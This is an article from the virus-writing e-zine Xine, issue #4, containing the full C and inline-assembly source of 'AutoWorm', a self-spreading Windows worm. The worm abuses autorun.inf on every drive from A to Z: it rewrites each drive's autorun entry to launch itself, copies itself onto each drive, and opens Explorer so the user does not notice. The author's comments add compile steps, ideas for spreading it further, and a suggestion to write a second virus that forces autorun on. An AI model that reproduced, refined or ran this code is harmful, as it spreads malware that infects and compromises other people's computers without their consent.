Copy Link
Add to Bookmark
Report
Xine - issue #4 - Phile 211
/-----------------------------\
| Xine - issue #4 - Phile 211 |
\-----------------------------/
/*
While making a Autorun for a cdrom I found that for
some weird reason if any drive A-Z network or not had
a autorun.inf which had a autrun open setting in it
when you explored it or click on the icon for that drive
you ran the autorun file. Ok this sound like that Mac worm
I read about for the imac So I spent some time and this file
was born. I did my best to use no c runtime stuff so if
you know how you can recompile with only the C code need to
run this monster.
All it does is when run first check and see if their was already
a file that should be autorun is so it runs that, then checks
all drives startting with A: - Z: for autorun.inf if found
it checks if AutoWorm is the file it should run if not
it alters the open setting to Autoworm.exe and copies the orginal
name to a WORM open entry so it can run this file later.
If not it opens the Explorer page the user expects so as calm
any suspcious minds (like they wont notice the A: drive trying to
run.... Ok it needs some work)
Ideas for future version:
Find away to see if Drive A: has a disk in it
or only try drive A at random times not every time...
Change any routines to procedures for neatness reasons
Me clean up , are you kidding :>
This is it enjoy, while this worm will rapidly spread on some
systems, all you need to do is have autorun turned off for all
drives and this file is never run, but a number of systems I tested
with win98 and winnt have this option on...
Or write another virus that would alter the reg entries to
have autorun turned on.
compile use VC5 from MS
cl autowomr.c Kernel32.lib /link /entry:WinMain
yeah I know there is a neater way, and if it does not work
try creating a win32 app workspace then add this autoworm.exe
then compile
murkry
*/
#include <windows.h>
/*#include "resource.h"*/
void VirusCopy(int nDrive);
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
PSTR szCmdLine, int iCmdShow)
{
DWORD dwDrives;
char szCurrDir[MAX_PATH + 1];
DWORD dwSizeCurDir = MAX_PATH + 1;
int nDrive;
char szBuff[MAX_PATH+100];
char szFile[50];
HANDLE hFind; //Handle for the FindFirst
HANDLE hFile; //Handle for New Files
WIN32_FIND_DATA fd;
DWORD dwWritten;//Temp Dword var
//First Show the people what they want to see
//Run Explore or the orginal AutoRun file
GetCurrentDirectory(dwSizeCurDir,(char*)&szCurrDir);
lstrcat((char*)&szCurrDir,"autorun.inf");
GetPrivateProfileString ("worm", "open","FAIL", szFile, 80,(char*)&szCurrDir );
if ( 0 == lstrcmpi("FAIL",(char*)&szFile) )
{
GetCurrentDirectory(dwSizeCurDir,(char*)&szCurrDir);
ShellExecute(NULL,"open",szCurrDir,NULL,NULL,SW_SHOWNORMAL);
}
else
{
ShellExecute(NULL,"open",szFile,NULL,NULL,SW_SHOWNORMAL);
}
//Start infection routine
dwDrives = GetLogicalDrives();
for (nDrive =0; nDrive <32; nDrive++) //32
{
if (dwDrives & (1 <<nDrive))
{
wsprintf( szBuff,"%c:\\Autorun.inf",nDrive+'A' );
hFind = FindFirstFile((char *)&szBuff,&fd);
if (hFind == INVALID_HANDLE_VALUE)
{
// MessageBox(NULL,"File does not exists *.inf",(char*)&szBuff,0);
//No Autorun.inf
//Create our own AutoRun.inf
//copy our file their as AutoWorm.exe
hFile = CreateFile((char *)&szBuff,GENERIC_READ | GENERIC_WRITE,
0,NULL,OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
if (WriteFile(hFile,
"[autorun]\xD\xAOPEN=AutoWorm.exe\xD\xA",
30, &dwWritten,NULL))
{
// MessageBox(NULL,"AutoRun.Inf Created","Attempting File Copy",0);
VirusCopy( nDrive);
} //File Autorun.inf writen to
CloseHandle(hFile); //Close the File Handle Create
} //Autorun.inf created
// MessageBox(NULL,"AutoWorm Not found","but Probaly created",0);
}
else// AutoRun.inf Found
{
//Yes Autorun.inf Read in Autorun open check if AutoWorm.exe
//If not write Vworm entry with value
//Copy AutoWorm.exe
//Change Autorun-open- AutoWorm.exe
// MessageBox(NULL,"File found AutoRun.inf",(char*)&szBuff,0);
//Check the Autorun.inf for Virus
if ( 0 != GetPrivateProfileString ("autorun", "open",
"FAIL", szFile, 80,(char*)&szBuff) )
{
// MessageBox(NULL,(char*)&szFile,"AutoRun Open = ",0);
if ( 0 == lstrcmpi("autoworm.exe",(char*)&szFile) )
{
// MessageBox(NULL,"We have Done it already","AutoRun",0);
} //Found the AutoRun and AutoWorm
else //found but not infected
{
//Write old setting
WritePrivateProfileString ("worm","open",
(char*)&szFile, (char*)&szBuff);
WritePrivateProfileString ("autorun","open",
"AutoWorm.Exe", (char*)&szBuff);
//Copy our File their
VirusCopy(nDrive);
}
}//End Check for AutoRun
}//end check for autorun.inf
FindClose(hFind);
}//End check for Drive
}//End loop through all drives up to 32
return 0; //Exit WinMain
}
void VirusCopy(int nDrive)
{
char szCurrDir[MAX_PATH + 100];
char szBuff[MAX_PATH+100];
DWORD dwWritten;
//Copy File
dwWritten = (DWORD)GetCommandLine();
nDrive = nDrive;
//asm code to move a string byte by by byte
//checking for " or null chars
_asm
{
push esi
push edi
mov esi, dwWritten
lea edi, dword ptr [szCurrDir]
lodsb
cmp al,'"'
je Quotes
stosb
Quotes:
NextOne:
lodsb
cmp al,'"'
je AddNull
stosb
or al,al
je EndOfStr
jmp NextOne
AddNull:
xor al,al
stosb
EndOfStr:
pop edi
pop esi
} //end asm block
//szCurrDir = Current File
wsprintf( szBuff,"%c:\\AutoWorm.Exe", nDrive + 'A' );
CopyFile(szCurrDir,szBuff,TRUE);
// MessageBox(NULL,"File Copied",(char*)&szBuff,0);
// MessageBox(NULL,"File Copied",(char*)&szCurrDir,0);
}//End VirusCopy